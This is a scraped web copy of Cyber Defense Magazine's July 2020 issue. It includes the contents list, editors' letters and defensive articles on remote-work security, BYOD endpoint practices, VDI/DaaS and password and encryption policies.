01.07.2020 Views

Cyber Defense eMagazine July 2020 Edition

Cyber Defense eMagazine July Edition for 2020 #CDM #CYBERDEFENSEMAG @CyberDefenseMag by @Miliefsky a world-renowned cyber security expert and the Publisher of Cyber Defense Magazine as part of the Cyber Defense Media Group as well as Yan Ross, US Editor-in-Chief, Pieruligi Paganini, Co-founder & International Editor-in-Chief, Stevin Miliefsky, President and many more writers, partners and supporters who make this an awesome publication! Thank you all and to our readers! OSINT ROCKS! #CDM #CDMG #OSINT #CYBERSECURITY #INFOSEC #BEST #PRACTICES #TIPS #TECHNIQUES

Cyber Defense eMagazine July Edition for 2020 #CDM #CYBERDEFENSEMAG @CyberDefenseMag by @Miliefsky a world-renowned cyber security expert and the Publisher of Cyber Defense Magazine as part of the Cyber Defense Media Group as well as Yan Ross, US Editor-in-Chief, Pieruligi Paganini, Co-founder & International Editor-in-Chief, Stevin Miliefsky, President and many more writers, partners and supporters who make this an awesome publication! Thank you all and to our readers! OSINT ROCKS! #CDM #CDMG #OSINT #CYBERSECURITY #INFOSEC #BEST #PRACTICES #TIPS #TECHNIQUES

SHOW MORE
SHOW LESS

You also want an ePaper? Increase the reach of your titles

YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.

Security, Convenience & Privacy: A

Neverending War

Is the New Normal Workspace Secure?

3 Practices to Avoid Security Risk in A Work

from Home World

7 Security Precautions to Protect Remote

Workers

…and much more…

Cyber Defense eMagazineJuly 2020 Edition 1

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


CONTENTS

Welcome to CDM’s July 2020 Issue ------------------------------------------------------------------------------------------------- 7

Security, Convenience & Privacy: A Neverending War------------------------------------------------------------- 24

By Michael Covington, VP of Product Strategy, Wandera

Is the New Normal Workspace Secure? ------------------------------------------------------------------------------- 26

By Simon Townsend, CMO, IGEL

3 Practices to Avoid Security Risk in A Work from Home World ------------------------------------------------ 29

By Akshay Bhargava, Chief Product Officer, Malwarebytes

7 Security Precautions to Protect Remote Workers ---------------------------------------------------------------- 32

By Marty Puranik, President & CEO, Atlantic.Net

The Race to Pivot Around Remote Work and The Emergence Of SASE ---------------------------------------- 36

By Amit Bareket, CEO and Co-Founder of Perimeter 81

Organizations: It’s Time to Rethink How You Protect Environments from Within-------------------------- 39

By Richard Melick, senior technical product manager, Automox

Don’t Be Breached When Using Commercial Software Products ----------------------------------------------- 42

By Randy Reiter CEO of Don’t Be Breached

Is Proactive Insider Risk Mitigation Possible? ------------------------------------------------------------------------ 44

By David A. Sanders, Director of Insider Threat Operations, Haystax

Benefits of A Security Operation Center (SOC) ----------------------------------------------------------------------- 50

By Pedro Tavares, Editor-in-Chief seguranca-informatica.pt

In 2020, SOCs Are Understaffed Yet Overconfident in Ability to Detect Cyberthreats --------------------- 53

By Steve Moore, chief security strategist, and Samantha Humphries, senior product marketing manager,

Exabeam

Software-Defined Perimeters Offer Secure Connectivity to Smart Cities ------------------------------------- 60

By Don Boxley, CEO and Co-Founder, DH2i (www.dh2i.com)

Managing Small Business Cybersecurity During Covid-19 -------------------------------------------------------- 63

By Bill DeLisi, CEO of GOFBA

Cyber Defense eMagazineJuly 2020 Edition 2

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


IOT Security Embedded in Memory Cards ----------------------------------------------------------------------------- 66

By Hubertus Grobbel, Vice President Security Solutions, Swissbit.

How To Fight A Virus: Lessons From Cybersecurity ----------------------------------------------------------------- 70

By Yotam Gutman, SentinelOne

How to Combat Cybersecurity Attacks & Cyber Warfare --------------------------------------------------------- 74

By Adnan Olia, Chief Operating Officer and Co-owner of Intradyn

COVID-19 And the Easyjet Hack - A Perfect Phishing Storm ------------------------------------------------------ 78

By Shachar Daniel, Safe-T’s CEO

Should We Be Worried About Vehicle Hacking? -------------------------------------------------------------------- 81

By Martin Banks

Cyber Attacks at Sea: Blinding Warships. ----------------------------------------------------------------------------- 85

By Julien Chesaux, Cyber Security Consultant, Kudelski Security

Iphone Extraction Without A Jailbreak -------------------------------------------------------------------------------- 92

By Oleg Afonin, Security Researcher, ElcomSoft Co.Ltd.

How to Maintain Anonymity in Communications? ----------------------------------------------------------------- 96

By Milica D. Djekic

Everything You Want to Know About Single Sign-On ------------------------------------------------------------ 100

By Ayman Totounji, Founder , Cynexlink

A Passwordless Future: Will Biometric Identification Replace Passwords? -------------------------------- 106

By Joshua Frisby, Founder of PasswordManagers.co

Post COVID-19: Cloud, Remote Work and BYOD Security Predictions --------------------------------------- 111

By Anurag Kahol, CTO and co-founder, Bitglass

The Rise of COVID-19 Phishing Attacks: How Cyber Adversaries Are Adopting Phishing to Generate

New Threat Vectors ------------------------------------------------------------------------------------------------------- 113

By Brad Slavin, CEO of DuoCircle LLC

Post COVID-19: Password Extinction Accelerated; Telemedicine Spurs Fraud ----------------------------- 117

By Robert Prigge, CEO of Jumio

Cyber Defense eMagazineJuly 2020 Edition 3

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


The Future Of Security – Predictions Post COVID-19 ------------------------------------------------------------- 119

By Mike Riemer, Pulse Secure, Global Chief Security Architect

Post COVID-19 Cybersecurity and Future-of-Work Predictions ------------------------------------------------ 121

By DivvyCloud by Rapid7, Chris DeRamus, VP of Technology, Cloud Security Practice

Building A Telework Health Scorecard To Meet Surge Requirements And Long-Term Resiliency ---- 124

By Stan Lowe, Global Chief Information Security Officer, Zscaler

CERT Warns Bad Actors Are Targeting Remote Access – How Security Operations Find And Route

These “Below The Radar” Attacks ------------------------------------------------------------------------------------ 128

By Saryu Nayyar, CEO, Gurucul

CRYPTO ---------------------------------------------------------------------------------------------------------------------- 130

By Staford Titus S

Cyber Defense eMagazineJuly 2020 Edition 4

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


@MILIEFSKY

From the

Publisher…

New CyberDefenseMagazine.com website, plus updates at CyberDefenseTV.com & CyberDefenseRadio.com

Dear Friends,

Since last month, we’ve seen a continuation and deepening of the effects of COVID-19 on

nearly all enterprises which depend on cyberspace for their operations. Both the articles in

this month’s magazine and our daily publications, as well as news from nearly all channels,

reflect the challenges of maintaining security in an ever-growing dependence on cyberrelated

systems of all kinds.

At the same time as the “normal” operations of enterprises across the board deal with these

issues on a daily basis, one major periodic phenomenon is coming into sharp focus. The

election cycle in the United States is upon us, with a mere 4 months until the presidential election.

There is little doubt that electronic activities will have a significant effect on the outcome of the election. Already

forces from both legitimate and illicit entities are manifesting their influence. From social media to traditional

news and commentary outlets, both attackers and defenders appear to be gearing up.

The apparent result of reopening of various States and municipalities has been described as a resurgence of the

first wave of COVID-19 as well as an incipient second wave. Whichever it is, the effects upon widespread

operations in the marketplace and the more focused impact on the electoral campaigns are undeniable. We will

continue to watch closely and report further developments.

We are pleased to continue providing the powerful combination of monthly eMagazines, daily updates and

features on the Cyber Defense Magazine home page, and webinars featuring national and international experts

on topics of immediate interest.

Warmest regards,

Gary S. Miliefsky

Gary S.Miliefsky, CISSP®, fmDHS

CEO, Cyber Defense Media Group

Publisher, Cyber Defense Magazine

P.S. When you share a story or an article or information about CDM, please use #CDM and

@CyberDefenseMag and @Miliefsky – it helps spread the word about our free resources even more

quickly

Cyber Defense eMagazineJuly 2020 Edition 5

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


@CYBERDEFENSEMAG

CYBER DEFENSE eMAGAZINE

Published monthly by the team at Cyber Defense Media Group and

distributed electronically via opt-in Email, HTML, PDF and Online

Flipbook formats.

InfoSec Knowledge is Power. We will

always strive to provide the latest, most

up to date FREE InfoSec information.

From the International

Editor-in-Chief…

The international effects of recent medical and political

developments continue to show up prominently in the world of

cybersecurity. We see a continuation of trends in Coronavirus

effects, cyber-criminal activity, and government actions in response

to these threats.

International effects of COVID-19 include restrictions on physical

travel, resulting in greater dependence on cyber “travel” to

accomplish necessary business and government functions. As

might be expected, the expanded reliance on cyber assets also

provide greater opportunities for criminal activity.

We may also note the divergence in approaches between the

European model, using an integrated set of laws and regulations,

on one hand, and the U.S. model, which tends to respond to these

challenges on a State-by-State basis, on the other. I hasten to add

there are some indications of movement on the federal level to

adopt national privacy laws which would provide a greater measure

of conformity.

As I observed last month, failure to work together in a cooperative

fashion can only provide more opportunities for the abuse and

misuse of sensitive information, even leading to the compromise of

the command and control systems of our critical infrastructure.

Accordingly, may I suggest that in the days ahead we agree to put

our differences aside in favor of responding to our common

enemies: the COVID-19 virus itself and those who would take

advantage of this crisis to perpetrate criminal schemes.

To our faithful readers, we thank you,

Pierluigi Paganini

International Editor-in-Chief

PRESIDENT & CO-FOUNDER

Stevin Miliefsky

stevinv@cyberdefensemagazine.com

INTERNATIONAL EDITOR-IN-CHIEF & CO-FOUNDER

Pierluigi Paganini, CEH

Pierluigi.paganini@cyberdefensemagazine.com

US EDITOR-IN-CHIEF

Yan Ross, JD

Yan.Ross@cyberdefensemediagroup.com

ADVERTISING

Marketing Team

marketing@cyberdefensemagazine.com

CONTACT US:

Cyber Defense Magazine

Toll Free: 1-833-844-9468

International: +1-603-280-4451

SKYPE: cyber.defense

http://www.cyberdefensemagazine.com

Copyright © 2020, Cyber Defense Magazine, a division of

CYBER DEFENSE MEDIA GROUP (a Steven G. Samuels LLC d/b/a)

276 Fifth Avenue, Suite 704, New York, NY 10001

EIN: 454-18-8465, DUNS# 078358935.

All rights reserved worldwide.

PUBLISHER

Gary S. Miliefsky, CISSP®

Learn more about our founder & publisher at:

http://www.cyberdefensemagazine.com/about-our-founder/

8 YEARS OF EXCELLENCE!

Providing free information, best practices, tips and

techniques on cybersecurity since 2012, Cyber Defense

magazine is your go-to-source for Information Security.

We’re a proud division of Cyber Defense Media Group:

CYBERDEFENSEMEDIAGROUP.COM

MAGAZINE TV RADIO AWARDS

Cyber Defense eMagazineJuly 2020 Edition 6

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Welcome to CDM’s July 2020 Issue

From the U.S. Editor-in-Chief

Once again, the July issue of Cyber Defense Magazine brings readers over two dozen articles on cyber

and security topics of immediate interest. We are fortunate to rely on a broad spectrum of contributors

who share their expertise and insights with our community.

We tend to look for trends and upcoming challenges and responses. For both individual consumers and

corporate participants, the establishment of a “value proposition” is the cogent answer to the question

“What problem does it solve?”

This month, readers will see elaboration of issues beyond the standard “cybersecurity” problems to solve.

For instance, the impact of the broad collection of sensitive personal data in controlling the spread of

COVID-19 potentially calls for strong protections of individual privacy. At some point, a balance must be

reached between the privacy needs of the individual and the “greater good,” a rhetorical construct which

can often lead to unintended adverse consequences.

The migration of workers to a permanent home-based operation appears to require more permanent

cybersecurity solutions than just a temporary setup with expectations for workers to return to the more

secure environment of HQ.

The age-old saying that “the only constant is change” holds true in these times, as demonstrated by the

breadth and depth of the articles we are pleased to bring you this month.

Wishing you all success in your cyber security endeavors,

Yan Ross

US Editor-in-Chief

Cyber Defense Magazine

About the US Editor-in-Chief

Yan Ross, J.D., is a Cybersecurity Journalist & US Editor-in-Chief for

Cyber Defense Magazine. He is an accredited author and educator and

has provided editorial services for award-winning best-selling books on

a variety of topics. He also serves as ICFE's Director of Special Projects,

and the author of the Certified Identity Theft Risk Management Specialist

® XV CITRMS® course. As an accredited educator for over 20 years, Yan addresses risk management

in the areas of identity theft, privacy, and cyber security for consumers and organizations holding sensitive

personal information. You can reach him via his e-mail address at

yan.ross@cyberdefensemediagroup.com

Cyber Defense eMagazineJuly 2020 Edition 7

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 8

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 9

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 10

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 11

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 12

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 13

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 14

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 15

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 16

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Your website could be vulnerable to outside attacks. Wouldn’t you like to know where those

vulnerabilities lie? Sign up today for your free trial of WhiteHat Sentinel Dynamic and gain a deep

understanding of your web application vulnerabilities, how to prioritize them, and what to do about

them. With this trial you will get:

An evaluation of the security of one of your organization’s websites

Application security guidance from security engineers in WhiteHat’s Threat Research Center

Full access to Sentinel’s web-based interface, offering the ability to review and generate reports as well

as share findings with internal developers and security management

A customized review and complimentary final executive and technical report

Click here to sign up at this URL: https://www.whitehatsec.com/info/security-check/

PLEASE NOTE: Trial participation is subject to qualification.

Cyber Defense eMagazineJuly 2020 Edition 17

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 18

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 19

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 20

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 21

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 22

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 23

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Security, Convenience & Privacy: A Neverending War

By Michael Covington, VP of Product Strategy, Wandera

The veritable “Sophie’s Choice” among security decision-makers has increasingly become the three-way

tug-of-war between security, convenience and privacy. With the introduction of General Data Protection

Regulation (GDPR) and California Consumer Privacy Act (CCPA) in 2018, there’s a clear global trend

toward prioritizing consumer privacy. However, the COVID-19 pandemic has spurred unprecedented

numbers of remote employees, leaving organizations grappling with a novel set of challenges when it

comes to security. Yet according to Verizon’s Mobile Security Index 2020 (MSI), organizations continue

to sacrifice security, with 52 percent of respondents citing convenience as a top reason to let security

take a backseat.

When GDPR took full effect in 2018, it was tangible evidence that people were ready to take more control

over their personal data. The terms of GDPR require organizations to ensure that the personal information

that is gathered during normal business transactions remains protected while still respecting the privacy

rights of data owners, demonstrating a heightened sense of concern over personal data privacy. The

passing of the California Consumer Privacy Act (CCPA) in the same year was further confirmation that

consumers were concerned about where and how their personal data was being used, and legislators

affirmed they were within their rights to know.

So, the pressure for organizations to remain transparent while simultaneously protecting the security of

their employees and users has been steadily building, leaving business and security leaders at a

crossroads. So the question remains: how are organizations to choose between security, convenience,

and privacy when it comes to their employees and customers alike?

Cyber Defense eMagazineJuly 2020 Edition 24

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Industry giants have chosen to approach this ongoing dilemma in different ways. Particularly as it

pertains to mobile security, Microsoft has tackled this challenge with the implementation of Mobile

Application Management without enrollment (MAM-WE). As work environments become increasingly

remote, organizations face an entirely new security landscape that will require them to adapt to BYOD

scenarios. MAM-WE gives organizations the ability to manage individual apps to protect sensitive

employee data, even from a personal device, in a setting outside the office. Microsoft’s offering is just an

example of ways that companies have broached the issue of security, without sacrificing convenience

and privacy.

There was roughly 24 percent of the full-time U.S. workforce working remotely for at least a portion of

their workweek in pre-pandemic days, but that number is steadily rising as a result of COVID-19. It’s now

critical that security decision-makers not overlook the importance of mobile and cloud security in this

evolving landscape. Our own analysis shows that as of March 30, the number of connections to

collaboration tools like Zoom and Microsoft Teams has increased by 109% since the first week of

February.

As Verizon’s Bryan Sartin put it, “The types of devices, diverse applications and further emergence of

IoT devices further complicate security. Everyone has to be deliberate and diligent about mobile security

to protect themselves and their customers.” Reiterating the sentiment that leaders will have to recognize

the inherent risks of increasingly mobile and cloud-connected environments and take proactive action.

There is a way to strike a balance between providing a convenient user experience that also maintains

the security and privacy of users. One recommendation would be for organizations to put policies in place

that utilize offerings like Wandera Private Access or MAM-WE to ensure that the security of corporate

data is not compromised, even when employees use a personal device. Outlining and adopting formal

acceptable use policies within organizations will also be a step toward finding this balance.

The findings from recent mobile threat research indicate a trend that decision-makers still believe they

have to make a choice between security, convenience, and privacy for their organizations. But with more

privacy-preserving and user-friendly security solutions becoming available, a harmonizing middle ground

can be found. It’s time to leave the notion that organizations can’t have both in the past, and focus on

solutions that allow for the security, convenience and privacy trifecta moving forward.

About the Author

Michael J. Covington, Ph.D., is a seasoned technologist and the Vice

President of Product Strategy for Wandera, a leading provider of mobile

security. Michael is a hands-on innovator with broad experience across the

entire product life cycle, from planning and R&D to executing on company

strategies. He previously held leadership roles at Intel Labs, Cisco Security,

and Juniper Networks. With a diverse background as a published computer

science researcher and as an IT professional, Michael has experienced

technology from all sides and enjoys bringing innovations to the market,

specifically in the areas of mobility and connectivity. He can be reached at

@MJCovington and at https://www.wandera.com/

Cyber Defense eMagazineJuly 2020 Edition 25

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Is the New Normal Workspace Secure?

Remote working has accelerated the need to better secure endpoints everywhere

By Simon Townsend, CMO, IGEL

Just a few years ago we were predicting Desktop-as-a-Service (DaaS) would soon have its day as

enterprises were looking for a way to keep up with the BYOD, multi-device, and user mobility movements.

It was time to rethink the ‘desktop’ from a fixed-location to a fluid endpoint that could be anywhere – one

which could exist as any device, and increasingly delivered virtually. Fast-forward to today and the

COVID-19 crisis, and the need to adopt a more modern approach to managing and securing the endpoint

has become painfully clear.

Enterprises have had to pivot overnight to a workforce sheltering in place with people working remotely

on a variety of devices that may or may not have been up to date on security protocols. With evidence

mounting that companies like Twitter are blessing working remote as a regular option going forward,

there are a few conclusions: 1) the workspace has to be digital since people are using multiple devices,

on site or remotely, 2) endpoint security needs to embrace this new work model and close all security

gaps, 3) DaaS and the cloud will become even more important to deliver consistent, secure user

experiences, and 4) Virtual Desktop Infrastructure (VDI) continues to be an optimum strategy for

maintaining system integrity from endpoints to the data center or cloud.

VDI and DaaS Up to the Task

New pressures on IT teams in response to the evolving COVID-19 recovery are not going to come with

bigger budgets or more staff. The increased need to improve security and ensure any asset used

Cyber Defense eMagazineJuly 2020 Edition 26

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


emotely is governed correctly via user profiles, associated policies, and access control, all while

supporting productivity, is added to the day-to-day IT process challenges businesses face. In a recent

survey of IT professionals Enterprise Strategy Group (ESG) found, after software licensing, inventory and

compliance, the main challenges in delivering a full-featured desktop centered on the pace of change

(30%), troubleshooting issues (29%) and operational costs (29%).

VDI and DaaS offer solutions to these IT challenges, with the benefit of maintaining a high level of security

without impacting user productivity. As ESG notes, businesses have implemented virtual desktop

infrastructure (VDI) and desktop-as-a-service (DaaS) to enable remote employees, but only a small

percentage of an employee base made use of this technology. Prior to COVID-19 neither technology

had reached high deployment, percentage wise, within organizations. The ESG survey found 40% of

respondents indicated that their organization currently uses VDI technology but 25% are on the verge of

doing so. Similarly, ESG found 39% of respondents reported DaaS usage but planned an increase. Post

COVID, ESG’s expectation is these deployments will rise to accommodate the changing work

environment.

Answering the Rise of Security Questions

The new business landscape has sharpened the focus to the digital workspace, to make sure the basics

of data security and risk mitigation are handled at the level needed to ensure business continuity. A more

remote workforce has shown how essential endpoint management and security is to business survival.

Businesses are looking at:

1. Balancing the need for access policy controls with employees’ desire to use more BYOD devices

remotely. The ESG survey found a significant disconnect: while 79% of organizations believe VDI

and DaaS are more secure than traditional desktop provisioning, 65% of the respondents will

have restrictions on the devices used to access VDI or DaaS workspaces. These businesses are

not ready to adopt a policy in which employees are allowed to use personal devices. While they

perceive VDI or DaaS as superior options, they draw the line at employee-owned devices.

2. Embracing a digital workspace solution like Citrix Workspace to further enable secure remote

access. Remote application and desktop delivery and access to web- and cloud-based DaaS

apps via a secure browser, paired with secure endpoint management software will enable

employees to access their user profile regardless of location. Whether using the cloud or DaaS,

workloads and sensitive data are protected.

3. Maintaining a high level of security without impacting user productivity. The ESG survey found

improving employee collaboration to be a top priority in delivering desktop environments, followed

closely by detecting security incidences, vulnerabilities, and risk, and managing user expectations

of access, devices choice, and applications preferences. An effective solution is a next-gen,

secure Linux OS on endpoints that can be auto-configured based on predefined profiles for simple

user access. Device agnostic, this type of advanced endpoint software can enable organizations

to secure all those remote BYOD devices without fear of security risk.

Cyber Defense eMagazineJuly 2020 Edition 27

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Making the New Normal Environment Safe

IT teams are certainly faced with an unprecedented list of challenges this year. However, the tools to

secure the new hybrid environment of more people working remotely fortunately do exist. VDI providers

like Citrix are proven options for secure, device agnostic desktop delivery. DaaS gives organizations

another route to deliver applications via the cloud, on demand and securely, enabling business continuity

in the case of a disruptive event. Advanced endpoint management software is already in successful

deployment, enabling workers to access their user profiles via the cloud, while IT policy controls are

executed to support network security.

Regardless of the system chosen, VDI or DaaS, the task is clear: organizations will need to embrace the

use of more personal and BYOD devices, coupled with advanced security software to manage the

changing work culture.

About the Author

Simon Townsend is global chief marketing officer for IGEL, provider of the

next-gen edge OS for cloud workspaces.

Cyber Defense eMagazineJuly 2020 Edition 28

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


3 Practices to Avoid Security Risk in A Work from Home

World

By Akshay Bhargava, Chief Product Officer, Malwarebytes

Well before COVID-19 hastened people working from home, users embraced “bring your own device”

(BYOD) practices. It created a proliferation of work-connected personal mobile devices that have become

a regular part of our workplace fabric. But today, as the workplace has shifted to our homes, employees

are now practicing a “use your own device” (UYOD) approach which means even more personal devices

are connecting to company networks.

Like BYOD, UYOD, enables employees to be connected to work when they want, and over any device

they have on hand – empowering them with the flexibility and access they need to work, at home. But

one concern still prevails: how to ensure proper security protocols are set and stringently followed in

order to provide the same level of security that corporate-owned devices bring.

The COVID-19 phenomenon brings personal endpoint device security concerns, once again, to the

forefront. Undoubtedly these personal devices come with a wide range of risk: while some diligent

employees may fastidiously follow security protocols, others that don’t take cybersecurity threats as

seriously will inadvertently expose their devices to bad actors. This uneven security posture comes at a

time when research shows the volume of global threats against business endpoints has increased by 13

percent year-over-year. From an increase in enterprise-focused threats to the diversification of

sophisticated hacking and stealth techniques, cybercrime is clearly targeting organizations with

increasing vengeance. And working from home on personal devices further elevates this risk.

Cyber Defense eMagazineJuly 2020 Edition 29

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Improving UYOD Security

While all organizations face increasing risk at the endpoint, small-to-medium sized businesses (SMBs)

are particularly vulnerable to a cyberattack. How could they not be when they are operating on thinner

margins, with limited IT staff and less financial reserves than enterprises? To minimize security risk,

SMBs need to put these practices in place when personal devices are being used to access business

data:

Embrace a Cultural Security Mindset. One of the obstacles to getting personal device security

under control is the mindset that someone else, usually IT, ‘owns’ the cybersecurity and data

protection problem. Even though 70 percent of data breaches are known to start at the endpoint,

this data point isn’t translating into the average employee or contractor’s consciousness.

No matter how strong defenses are, users can introduce threats to a company’s networks by:

• Falling for phishing scams

• Posting secure information on social media

• Inadvertently giving away credentials

Employees will more enthusiastically embrace BYOD/UYOD security protocols if management

has effectively communicated not only the how behind day-to-day practices to prevent malware

or other attacks, but also why mitigating risks is so critical. Acceptable use guidelines might

include:

• How to detect social engineering tactics and other scams

• What constitutes acceptable Internet usage

• How remote workers should securely access the office network

• How to properly use password management systems

• How to report security incidents according to their urgency

To encourage employees to adopt ownership of their own device security, it’s important to note

smaller enterprises thrive on being more nimble. This ‘get it done now’ mentality can lead to

applications being put into play before being thoroughly vetted for access controls and may cause

a rise in “shadow IT” which may not meet organizational security standards. It can also lead to

‘rogue’ assets, or personal devices being deployed without full vetting for risks.

The recent wholesale shift to remote working has highlighted this risk more than ever as personal

device use explodes. When communicating with employees, there needs to be a careful balance

between asking them to be more mindful of security and realizing their first goal is always to get

their work done. Communication and education here are essential to individual participation in

helping mitigate risk at the endpoint.

Optimize Limited Resources. With limited IT staff, and often no dedicated security staff, SMBs will

be looking to guard against the increased security risks from COVID-19 by executing strategic

security initiatives for newly remote workers and supporting long-term viability. One critical need

in threat defense is endpoint detection and response (EDR) software. EDR is vital to containing

a costly breach that could financially devastate an SMB or enterprise. EDR can help software

security teams contain, investigate and respond to threats that may have bypassed other

defenses like antivirus tools. An effective EDR solution can provide automated analysis of data to

identify suspicious activity, enabling IT to make a timely decision on the threat level and take quick

action accordingly.

Cyber Defense eMagazineJuly 2020 Edition 30

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Simplifying personal endpoint device protection is also imperative. Managing protection for many

devices, given scarce resources, demands centralized management from a single pane of glass

to provide real time protection and on-demand remediation. Many SMBs may also consider

outsourcing their security needs to a managed service provider (MSP) in order to free up

resources, but this should not take the place of employee security training.

Apply Privacy Protection. As users work from home, they need an extra layer of protection to stop

cyberattack risk – as they are no longer behind the security of your corporate network. This is

where the value of a virtual private network (VPN) comes into play. This important, and often

overlooked, layer of defense ensures that a users’ IP address is private, secure, and encrypted,

helping to protect your business data.

Serving as a digital middleman between the user and the Internet, a VPN can deter hacking and

unauthorized tracking which will help prevent employees from being cyberthreat targets. It works

like an encrypted tunnel between the user and your data, keeping away the prying eyes of threat

actors looking to access your business data – including passwords, personally identifiable

information (PII), customer information, credit card numbers and more. By employing a VPN, you

can limit the risk of employees working from their personal networks while protecting critical

business and customer information.

Post-COVID Environment

Eventually employees will begin returning to work onsite, but this crisis has demonstrated the benefits of

working at home. This means that the heightened use of personal devices for business is here to stay.

SMBs can manage this new working reality by improving employee communication on threat prevention,

creating a strategy to more thoroughly record and protect assets, and implementing the protection of a

VPN to keep important business data away from prying eyes.

In the longer term, all these security measures are going to be critical to economic viability.

Cybercriminals have been exploiting COVID-19, but they will revert back to other forms of cybercrime soon

enough and ransomware attacks, costly data breaches and business disruption will be back in the news.

SMBs can avoid tragedy by implementing strong preventative anti-attack measures now.

About the Author

Akshay Bhargava is the Chief Product Officer at Malwarebytes, a leading

provider of advanced endpoint protection and remediation solutions.

Cyber Defense eMagazineJuly 2020 Edition 31

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


7 Security Precautions to Protect Remote Workers

By Marty Puranik, President & CEO, Atlantic.Net

The COVID-19 pandemic has engulfed the world's population, crippled global economies, and changed

the way of life for almost every single person in every single country around the world. Nearly six million

infection cases have been confirmed. Over two million people have recovered, but over 350,000 deaths

have been registered so far, and sadly this figure is expected to grow substantially in the coming days

and weeks.

Governments around the world have encouraged employees to work from home wherever possible.

Frontline key workers are still required to continue their occupations but unfortunately, many millions

have lost their jobs, and tens of millions have been furloughed on government financial aid.

Currently, there is an enormous workforce engaged and actively working from home, keeping businesses

alive in one of the biggest challenges to face a generation. Some reporters are referring to this shift in

working behavior as the greatest work-from-home experiment.

With this paradigm shift of working behavior, additional risks and security concerns must be considered

to protect organizations from things like wire transfer fraud, ransomware, and exploitation. There is a vast

amount of evidence to suggest that cybercriminals are out in force to take advantage of the COVID-19

pandemic.

The most common attack vectors seen in recent weeks are targeted and extensive phishing email

campaigns and spoofing using SMS and mobile communications platforms such as WhatsApp.

Cyber Defense eMagazineJuly 2020 Edition 32

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


What can you do to protect your workforce and business from being compromised? We have compiled

a list of some of the most effective measures to be undertaken to protect your organization.

Make Sure Your Security Policy Is Valid

The COVID-19 outbreak has highlighted that most organizations’ cybersecurity policies, especially

policies regarding mobile computing and teleworking, may be inadequate. Businesses have been

scrambling to change the guidelines to adapt to the pandemic. Very few organizations would have had a

business continuity strategy that solved all the issues brought about by the seismic shift to home working.

Specific policies to update may revolve around the physical protection of company IT equipment, making

sure children or relatives do not use company assets, which can help to keep assets in good working

condition. If additional technology is needed by the employee, such as extra monitors, keyboards, or

printers, a formal process should exist to track where company assets are located. Perhaps logging a

service desk ticket for management teams to approve the removal of company technology. This process

greatly improves how assets can be tracked.

Other control measures can be introduced or updated to define the organization's rules and regulations

on the usage of laptops, computers, handheld tablets, mobile phones, and digital media, including disks

and memory sticks.

Keep Data Protection Relevant

Maintaining data protection is critically important for organizations, even more so when employees are

working from home. Organizations are duty-bound by government regulations to uphold data protection.

The regulations still apply no matter where the employees are working, be that an office-based role, or

when working from home.

All laptops should have some form of data encryption software installed, such as Microsoft BitLocker.

This software protects the data stored on the employee’s physical device. In the event a company device

is lost or stolen, the data is secured and encrypted. Domain policies can force remote terminals to lock

the screen after a few minutes of inactivity during the lockdown period.

All portable equipment should have a machine or boot-up password, and a domain user account that

should be required when powered up. This may be a BIOS protected screen lock, or it might just be the

Windows Logon utility. Either way, the device must not boot straight into the operating system without

prompting for credentials. This will stop unauthorized access to the data stored on the equipment.

Secure Physical Assets

High valued assets must already have the standard security features such as usernames, passwords,

and PINs. Extreme care should be taken with mobile computing being used outside of the organization’s

Cyber Defense eMagazineJuly 2020 Edition 33

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


premises. In the home environment, extra care should be taken to secure customer and organizational

data.

Protection should be in place to avoid unauthorized access or disclosure of the information stored and

processed by the equipment. No other person should be able to access the equipment or view information

on the screen, and you should guard against eavesdropping. Do not openly discuss confidential or

Payment Card Information where you may be overheard.

Create Strong Passwords

Ensuring a strong and robust password protection policy might sound like common sense, however, the

weakest point of security on a corporate network is the end-user. Enforcing system-wide, managed

password policies can help to create a hardened perimeter on the network.

Support teams may have to do a little extra work to unlock and reset user accounts if the password is

forgotten, but instilling a complex password policy, and a regular, enforced password expiration date will

help to give the best protection to the remote workforce.

